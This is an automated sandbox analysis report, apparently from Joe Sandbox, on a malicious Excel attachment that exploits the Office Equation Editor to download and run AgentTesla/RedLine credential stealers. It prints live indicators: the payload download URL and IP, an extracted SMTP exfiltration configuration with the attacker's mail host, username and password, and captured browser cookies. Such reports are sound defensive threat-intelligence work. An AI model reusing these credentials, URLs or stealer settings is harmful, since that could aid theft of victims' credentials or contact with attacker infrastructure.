Windows Analysis Report
Order Request1_5_24.xlam.xlsx

Overview

General Information

Sample name: Order Request1_5_24.xlam.xlsx
Analysis ID: 1435095
MD5: 8216d3088f8358388dfcbdc7026f2ea1
SHA1: 3040eaecd169f745eae12c30652eebc676c3f234
SHA256: 37d95e56ed2ab7dbaeae0f8afad3d94ffd9286dee2447ad631b52ecd84a4f47a
Tags: AgentTesla, xlam, xlsx

Detection

AgentTesla, PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 2060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • OIU.exe (PID: 1996 cmdline: C:\Users\user\AppData\Roaming\OIU.exe MD5: 158C5C0367C262694F3C44AE85B891B6)
        • RegSvcs.exe (PID: 2072 cmdline: C:\Users\user\AppData\Roaming\OIU.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
        • OIU.exe (PID: 1100 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
          • RegSvcs.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
          • OIU.exe (PID: 1016 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
            • RegSvcs.exe (PID: 536 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
            • OIU.exe (PID: 2356 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
              • RegSvcs.exe (PID: 2216 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
              • OIU.exe (PID: 1376 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 158C5C0367C262694F3C44AE85B891B6)
                • RegSvcs.exe (PID: 2220 cmdline: "C:\Users\user\AppData\Roaming\OIU.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • chrome.exe (PID: 2640 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 1776 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 3864 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 4020 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name | Description | Attribution | Blogpost URLs | Link
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": "     XY%R[udi4U]=    "}
Source | Rule | Description | Author | Strings
Source: sheet1.xml | Rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document | Description: detects AutoLoad documents using LegacyDrawing | Author: ditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2525:$s3: autoLoad="true"
Source | Rule | Description | Author | Strings
Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 51 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source | Rule | Description | Author | Strings
Source: 12.2.RegSvcs.exe.37b7770.6.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 12.2.RegSvcs.exe.37b7770.6.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 12.2.RegSvcs.exe.37b7770.6.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 12.2.RegSvcs.exe.37b7770.6.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
  • 0x3ddff:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3de71:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3defb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3df8d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3dff7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3e069:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3e0ff:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3e18f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 12.2.RegSvcs.exe.530000.3.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security

                  Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2060, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2060, TargetFilename: C:\Users\user\AppData\Roaming\OIU.exe

                  System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2060, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Jason Lynch | Data: Command: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\OIU.exe, NewProcessName: C:\Users\user\AppData\Roaming\OIU.exe, OriginalFileName: C:\Users\user\AppData\Roaming\OIU.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2060, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\OIU.exe, ProcessId: 1996, ProcessName: OIU.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine: C:\Users\user\AppData\Roaming\OIU.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\OIU.exe, NewProcessName: C:\Users\user\AppData\Roaming\OIU.exe, OriginalFileName: C:\Users\user\AppData\Roaming\OIU.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2060, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\OIU.exe, ProcessId: 1996, ProcessName: OIU.exe
                  No Snort rule has matched

                  AV Detection

Source: Order Request1_5_24.xlam.xlsx | Avira: detected
Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": " XY%R[udi4U]= "}
Source: http://23.94.54.101/IZG.exe | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Roaming\OIU.exe | ReversingLabs: Detection: 27%
Source: Order Request1_5_24.xlam.xlsx | Virustotal: Detection: 52%
Source: Order Request1_5_24.xlam.xlsx | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\OIU.exe | Joe Sandbox ML: detected

                  Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 23.94.54.101 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: _.pdb source: RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OIU.exe, 00000003.00000003.457625635.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000003.00000003.457568121.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460414972.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460320894.0000000002990000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462048122.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462023023.0000000002950000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463861681.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463799420.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465588880.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465720630.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00C0DBBE
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BDC2A2 FindFirstFileExW,3_2_00BDC2A2
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C168EE FindFirstFileW,FindClose,3_2_00C168EE
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00C1698F
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D076
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D3A9
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C19642
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C1979D
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00C19B2B
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00C15C97

                  Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035206C1 WriteFile,2_2_035206C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520661 LoadLibraryW,2_2_03520661
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520867 WinExec,ExitProcess,2_2_03520867
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0352070D WriteFile,2_2_0352070D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035207B4 WriteFile,WinExec,ExitProcess,2_2_035207B4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0352062A CreateFileW,2_2_0352062A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520729 WriteFile,2_2_03520729
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0352075A WriteFile,2_2_0352075A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035205DE CreateFileW,2_2_035205DE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520776 WriteFile,2_2_03520776
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520617 CreateFileW,2_2_03520617
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0352079A WriteFile,2_2_0352079A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0352059B CreateFileW,2_2_0352059B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520582 ExitProcess,CreateFileW,2_2_03520582
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03520887 ExitProcess,2_2_03520887
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035205B7 CreateFileW,2_2_035205B7
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Wed, 01 May 2024 18:27:08 GMT | Accept-Ranges: bytes | ETag: "56802d2df59bda1:0" | Server: Microsoft-IIS/8.5 | Date: Thu, 02 May 2024 02:59:07 GMT | Content-Length: 1287680
Source: global traffic | HTTP traffic detected: GET /IZG.exe HTTP/1.1 | Connection: Keep-Alive | Host: 23.94.54.101
Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: unknown | TCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_00C1CE44
                  Source: global traffic | HTTP traffic detected: GET /chrome/whats-new/m109?internal=true HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                  Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
                  Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8
                  Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE
                  Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
